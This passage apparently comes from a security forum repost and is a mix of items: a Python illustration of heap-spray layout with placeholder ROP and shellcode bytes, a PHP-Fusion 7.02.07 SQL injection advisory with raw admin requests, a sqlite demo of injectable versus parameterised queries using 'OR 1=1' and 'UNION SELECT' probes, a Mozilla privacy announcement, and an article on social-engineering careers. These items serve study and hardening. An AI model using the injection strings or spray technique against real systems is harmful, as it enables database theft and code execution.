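Added example (Python; this is not part of the exploit above and not exploit-db's code): it rebuilds the payload layout that the ASCII diagram and the `data` construction describe, in bytes rather than JavaScript string units (each `%uXXXX` unit is two bytes, so the 0x800-unit `data` string is a 0x1000-byte period and a 0x40000-0x58-unit title is an 0x80000-0xb0-byte allocation), and checks the property the spray relies on: in every period the pivot sits at the same offset and a ROP copy starts exactly 0x1cc bytes before it. The offset, pivot, ROP and shellcode bytes are constructed placeholders; the real values are not on the page.

```python
# Added illustration of the spray layout above; not the exploit's own code.
# All payload bytes and the offset are constructed placeholders.

PERIOD = 0x1000          # the exploit's 0x800-unit `data` string, in bytes
ROP_GAP = 0x1cc          # from the pivot back to the first ROP copy (diagram arrow)
JUNK = b"\xc2\x4c\x34\x7c"   # constructed filler standing in for unescape("%u4cc2%u7c34")


def fill(n: int, pattern: bytes = JUNK) -> bytes:
    """n bytes of repeated filler, like the `while (buffer.length < ...)` loops."""
    return (pattern * (n // len(pattern) + 1))[:n]


def build_period(offset: int, pivot: bytes, rop: bytes, shellcode: bytes) -> bytes:
    """One PERIOD-byte unit with the page's layout:
       junk | rop | shellcode | junk | pivot (at `offset`) | rop | shellcode | junk
    The first rop copy starts exactly ROP_GAP bytes before the pivot."""
    first_rop = offset - ROP_GAP
    if first_rop < 0 or first_rop + len(rop) + len(shellcode) > offset:
        raise ValueError("rop + shellcode must fit between offset-0x1cc and offset")
    head = fill(first_rop) + rop + shellcode
    head += fill(offset - len(head))           # pad up to the pivot position
    unit = head + pivot + rop + shellcode      # second copy right after the pivot
    if len(unit) > PERIOD:
        raise ValueError("payload does not fit in one period")
    return unit + fill(PERIOD - len(unit))


def build_block(unit: bytes, block_size: int) -> bytes:
    """Repeat the unit to one spray allocation, as `data += data` then
    `substring(0, 0x40000-0x58)` does (0x80000-0xb0 bytes)."""
    reps = -(-block_size // len(unit))         # ceiling division
    return (unit * reps)[:block_size]


def pivot_hits(block: bytes, pivot: bytes) -> list:
    """Byte offsets at which the pivot marker appears in the block."""
    hits, i = [], block.find(pivot)
    while i != -1:
        hits.append(i)
        i = block.find(pivot, i + 1)
    return hits


def rop_at_gap(block: bytes, hit: int, rop: bytes) -> bool:
    """True if a ROP copy sits exactly ROP_GAP bytes before this pivot copy."""
    start = hit - ROP_GAP
    return start >= 0 and block[start:start + len(rop)] == rop


def check_layout(block: bytes, offset: int, pivot: bytes, rop: bytes) -> bool:
    """Every pivot copy is at offset + k*PERIOD and has a ROP copy ROP_GAP bytes
    before it, so the pivot-to-chain distance is identical in every period."""
    hits = pivot_hits(block, pivot)
    return bool(hits) and all(
        h == offset + k * PERIOD and rop_at_gap(block, h, rop)
        for k, h in enumerate(hits)
    )


if __name__ == "__main__":
    unit = build_period(0x300, b"PIVT", b"R0P-CHAIN", b"SHELLCODE")   # placeholders
    block = build_block(unit, 0x80000 - 0xb0)
    print(len(pivot_hits(block, b"PIVT")), "pivot copies per spray allocation")
    print("layout consistent:", check_layout(block, 0x300, b"PIVT", b"R0P-CHAIN"))
```

`check_layout` returns False as soon as the offset used to build the period and the one the pivot is expected at disagree, which is the kind of miscount that makes a spray land the pivot in filler instead of on the chain.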
-
[h=1]PHP-Fusion 7.02.07 - SQL Injection[/h]
# Exploit Title: PHP-Fusion 7.02.07 SQL Injection
# Date: 06/11/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.php-fusion.co.uk
# Software Link: http://ufpr.dl.sourceforge.net/project/php-fusion/PHP-Fusion%20Archives/7.x/PHP-Fusion-7.02.07.zip
# Version: 7.02.07
# Tested on: Linux OS (Debian)
# CVE : CVE-2014-8596

GET /PHP-Fusion/files/administration/submissions.php?action=2&aid=9b23a9871adc75cd&submit_id=1[SQL Injection]&t=n HTTP/1.1
Host: 192.168.0.105
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620b17122152bf157283f; fusion68fF5_lastvisit=1414550801; session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9; fusion68fF5_visited=yes; has_js=1;
Connection: keep-alive

and

GET /PHP-Fusion/files/administration/members.php?aid=9b23a9871adc75cd&status=4[SQL Injection] HTTP/1.1
Host: 192.168.0.105
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620b17122152bf157283f; fusion68fF5_lastvisit=1414550801; session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9; fusion68fF5_visited=yes; has_js=1;
Connection: keep-alive

More information (in Brazilian Portuguese): https://www.xlabs.com.br/blog/?p=282

Sursa: http://www.exploit-db.com/exploits/35206/
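Added example (Python with the standard-library sqlite3 module; not PHP-Fusion's code and not the advisory's): it shows the query pattern that makes an integer parameter such as `status=4` injectable, and the corrected form. The `users` table, its rows and the function names are constructed for this illustration; PHP-Fusion's real schema and code are not on the page. Note that both requests above target `administration/` and carry an `aid` value, so a valid administrator session is needed to reach the injectable parameters.

```python
import sqlite3

# Constructed table and rows; they stand in for PHP-Fusion's users table and are
# not its real schema. user_status mirrors the `status` parameter of members.php.
ROWS = [
    (1, "admin",  0, "hash-admin"),
    (2, "alice",  0, "hash-alice"),
    (3, "banned", 4, "hash-banned"),
]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user_name TEXT, "
               "user_status INTEGER, user_password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", ROWS)
    return db


def members_vulnerable(db: sqlite3.Connection, status: str) -> list:
    """Hypothetical vulnerable pattern (not PHP-Fusion's code): the request
    parameter is concatenated into the statement. Because the column is numeric
    the value is not quoted, so no quote character is needed to break out."""
    sql = "SELECT user_name, user_password FROM users WHERE user_status=" + status
    return db.execute(sql).fetchall()


def members_fixed(db: sqlite3.Connection, status: str) -> list:
    """Hardened form: enforce the integer type, then bind the value as a
    parameter instead of concatenating it."""
    if not status.isdigit():
        raise ValueError("status must be a non-negative integer")
    return db.execute(
        "SELECT user_name, user_password FROM users WHERE user_status=?",
        (int(status),),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(members_vulnerable(db, "4"))           # only the status-4 row
    print(members_vulnerable(db, "4 OR 1=1"))    # every row, password hashes included
    # schema extraction through the same parameter (sqlite_master is SQLite's catalog)
    print(members_vulnerable(db, "-1 UNION SELECT name, sql FROM sqlite_master"))
    print(members_fixed(db, "4"))
```

The `-1 UNION SELECT ...` probe is the point of the advisory's `status=4[SQL Injection]` marker: an integer parameter is no safer than a string one when it is concatenated. In PHP the equivalent of `members_fixed` is casting with `intval()` before use, or binding the value through a PDO or mysqli prepared statement.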
-
[h=1]Introducing Polaris Privacy Initiative to Accelerate User-focused Privacy Online[/h]
Denelle Dixon-Thayer

At Mozilla, we believe that an individual’s privacy on the Internet cannot be treated as optional. Our Privacy Principles guide us in the design of each of our products and services. We’ve introduced features to support our privacy focus across desktop and mobile, including: an add-on platform with Firefox Add-ons like LightBeam, Ghostery and Privacy Badger; the Do Not Track preference; Private and Guest Browsing; high levels of encryption with Firefox Sync; an individual approach to app permissions; and even a new Forget button. But we recognize we need to do better and do more. We want to give our users the Web experience they want through features that create transparency and control. We want our users to trust us and the Web.

In October 2014, Harris Poll conducted a global online survey* on behalf of Mozilla of more than 7,000 online adults ages 18-64. Three quarters (74%) of people feel their personal information on the Web is less private today than it was one year ago. The same share of adults agree that Internet companies know too much about them. We think we can help with this concern.

Today, we are excited to announce a new strategic initiative at Mozilla called Polaris. Polaris is a privacy initiative built to pull together our own privacy efforts along with those of other privacy leaders in the industry. Polaris is designed to allow us to collaborate more effectively, more explicitly and more directly to bring more privacy features into our products. We want to accelerate pragmatic and user-focused advances in privacy technology for the Web, giving users more control, awareness and protection in their Web experiences. We want to advance the state of the art in privacy features, with a specific focus on bringing them to more mainstream audiences.

We’re joined at launch by the Center for Democracy & Technology (CDT) and the Tor Project, both non-profits, who will support and advise Polaris projects and help us align them with policy goals. We believe that the support and assistance from each of these groups is crucial. “CDT looks forward to working with Mozilla on the Polaris program and advising on issues like combating Internet censorship and protecting online anonymity, which are vital to promoting free expression online,” said Justin Brookman of CDT. Not only will these collaborations hold us accountable to staying true to our goal of getting new and innovative privacy features into our general release products; the diversity of understanding, focus and opinion will also improve what we bring to the mainstream.

Today we’re announcing two experiments under the Polaris banner, focused on anti-censorship technology, anonymity, and cross-site tracking protection.

First, Mozilla engineers are evaluating the Tor Project’s changes to Firefox, to determine if changes to our own platform codebase can enable Tor to work more quickly and easily. Mozilla will also soon begin hosting our own high-capacity Tor middle relays to make Tor’s network more responsive and allow Tor to serve more users. “The Tor Project is excited to join Mozilla as a launch partner in the Polaris program. We look forward to working together on privacy technology, open standards, and future product collaborations,” said Andrew Lewman of the Tor Project.

The second experiment (our first in-product Polaris experiment) seeks to understand how we can offer a feature that protects those users who want to be free from invasive tracking without penalizing advertisers and content sites that respect a user’s preferences. We’re currently testing this privacy tool in our “Nightly” channel. The experiment is promising, but it’s not a full-fledged feature yet. We’ll test and refine the user experience and platform behavior over the coming months and collect feedback from all sides before this is added to our general release versions.

We recognize that privacy is not just a functionality on your computer or a setting you can turn on or off, and we’re excited to see what we can do to advance privacy online with Polaris. To learn more or to join us, visit the wiki.

*Survey Methodology
This survey was conducted online within Great Britain, France, Spain, Germany, Brazil, and India between October 22nd and 29th, 2014 among 7,077 adults (aged 18-64) by Harris Poll on behalf of Mozilla via its Global Omnibus product. Figures for age, sex, race/ethnicity, education, region and household income were weighted where necessary to bring them into line with their actual proportions in the population. Where appropriate, these data were also weighted to reflect the composition of the adult online population. For complete survey methodology, including weighting variables, please contact press@mozilla.com

Sursa: https://blog.mozilla.org/privacy/2014/11/10/introducing-polaris-privacy-initiative-to-accelerate-user-focused-privacy-online/
-
How To Become a Social Engineer
November 10, 2014

I really must admit that one of the most asked questions we get through the website is something like, “I really want to get into social engineering as a career, what should I read/take in college to give me the best chance?”, followed up by “How do I get into this as a job/career?” It is a serious question that we have spent considerable time trying to come up with an appropriate answer for. This month I will answer the education piece, by telling you my own thoughts, what I look for when I hire and also what some of my most trusted friends from large companies look for when hiring. Then next month, I will go into how to make this your career.

So you wanna be a social engineer?

I understand why the question comes in so often. This job is pretty cool sounding. We get paid to phish, vish and break into companies every day. That certainly sounds like the dream job – well at least for a lot of us. Like most careers, it is logical to think that there may be a clear path of education to give you a leg up in this field. Some people ask me if they should study psychology, or if they should get sales experience; others wonder if they should skip school altogether. What’s the answer?

Let’s first ask my good friend Jim. He manages a large team of pentesters that includes red teams, social engineers and some excellent hackers at one of the world’s largest financial institutions. I asked him this question: “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester, what do you look for? Education, experience or a combination?”

Jim says, “First of all I look for experience. But there are certifications that mean something to me like Offensive Security’s certifications (OSCP / OSCE) and the CISSP. In addition, my mantra is generally: Jack-of-all-trades, master of a couple. I look for folks who have a fairly broad generalist experience, but have taken an interest in deeply diving into one or two. I also look for mentality; can the candidate think like a bad guy? Is security your job, or a passion? What does your home network look like? And very importantly, does the candidate have the ability to communicate clearly, concisely, and professionally? Finally, personal references are good, especially when it comes to character, since if you join my team you’re going to have to be a highly trusted individual.”

Thanks Jim, that was very helpful. I went to another very close friend who has been in the industry for a very long time, helping run Black Hat and now running the Global Education and Training practice at Accuvant, Ping Look. I asked Ping the same question: “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester, what do you look for? Education, experience or a combination?”

Ping said, “Accuvant does not look for degrees – experience, the ability to pass the practical exams that we administer, and references, especially industry ones, are more important. I know that most hackers’ goals aren’t to be promoted to management, but the reality is that everyone has to make a living and having more responsibility within a company usually means a promotion, whether it be to management or not. I do know from the anecdotal experience of others that at a lot of larger firms, not having a college degree will make it more difficult to be promoted (initially) to management positions. HOWEVER, in a technical field, smart companies know that InfoSec is still an emerging marketplace and that finding a candidate with a college degree, especially in computer science, who is also a good infosec practitioner with the necessary experience will be very difficult. Over time, those who prove themselves technically adept and have good management chops end up having the same chance of getting promotions or running teams or being lead technologist or chief research scientist as the guy with a degree.”

Another excellent answer that really helps us get a clear picture. Finally, I went to my good friend, Dave Kennedy. Dave started his own company just a few years ago, Trusted Sec, and went from just a couple of people to over 20. He obviously knows a thing or two about hiring pentesters. So I presented him with the same question: “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester, what do you look for? Education, experience or a combination?”

Dave said, “I favor experience over education any day. Although a college degree is important, I am looking for someone who has the experience to handle the type of work that we get. References are important, but I tend to hire people I’ve known and trust in the industry, so I always get individuals I know and trust to do the work.”

All three answers really paint a great picture for anyone thinking and asking. What about Social-Engineer, Inc? My company has grown over the last couple of years, so I have had to spend considerable time thinking about what it is that I need in employees. Unlike some of the great minds I asked above, my needs are a tad bit different. But let me pick out the similarities from what we saw above:

[*] Experience always wins. Many of my team have degrees, and some, like Michele, are not only highly educated but trained educators. Even with that, experience is king. Now with that said, there aren’t slews of people who have tons of experience in phishing, vishing and breaking into buildings without having a criminal record. I will discuss later how we get around this particular hurdle.
[*] Mentality. This is a big one because there are many components to this particular topic:
    Can the person think like a bad guy? We have a motto in my company, “Always leave them feeling better for having met you.” We apply that to how we want our customers to feel about our services. So although I need my people to be able to THINK like a bad guy, I need them to care enough about the customer that they don’t revel in the bad side too long.
    Desire to learn. We are in a constant state of growth, and part of that is learning how to adapt when the times, attack vectors and methods of the bad guys change. My team has to be willing to do that.
    Learn from failure. I have failed so many times I can’t count them, but the important part is learning from each failure. My team has to be willing to have the same attitude.
    Is this a hobby or a passion? It is important to me to find people who enjoy the work and don’t just look at it as a “job”.
[*] Performance based education. Right now, from what I have found, Social-Engineer has the only performance based SE certification around. I also favor the Offensive Security certifications as they prove fortitude, persistence and critical thinking skills.
[*] Critical thinkers. Probably one of the most important aspects of being a social engineer is being able to think critically: to adapt, flex and change your methods on the fly, and to think outside the box, as if there is no box.
[*] Willingness to try new things. Many times my team will be required to try completely new things: new pretexts, new methodologies and new processes.

Does this mean that education is completely useless? No, not at all. Depending on the role we are looking for, a degree can definitely add to a person’s usefulness and to the position we use them for. If you are going to college already and you are thinking of a career in pentesting and maybe even social engineering, then there are some areas of study that can help. Things like computer science, psychology and social psychology can all help. Of course, we think everyone who wants to be a social engineer should take our 5-day “Advanced Practical Social Engineering” course too. In the end, the fortitude to stick through college, study hard and graduate with good grades can tell a potential employer that you have some great qualities that make a good employee.

At the end of the day, social engineering is an exciting and very rewarding career path. Study hard, stay out of trouble and get practical experience where you can, and it may just be your career someday too. Next month we will discuss the HOW… till then, stay safe.

- See more at: http://www.social-engineer.org/newsletter/social-engineer-newsletter-vol-05-issue-61

Sursa: How To Become a Social Engineer | Christopher Hadnagy | LinkedIn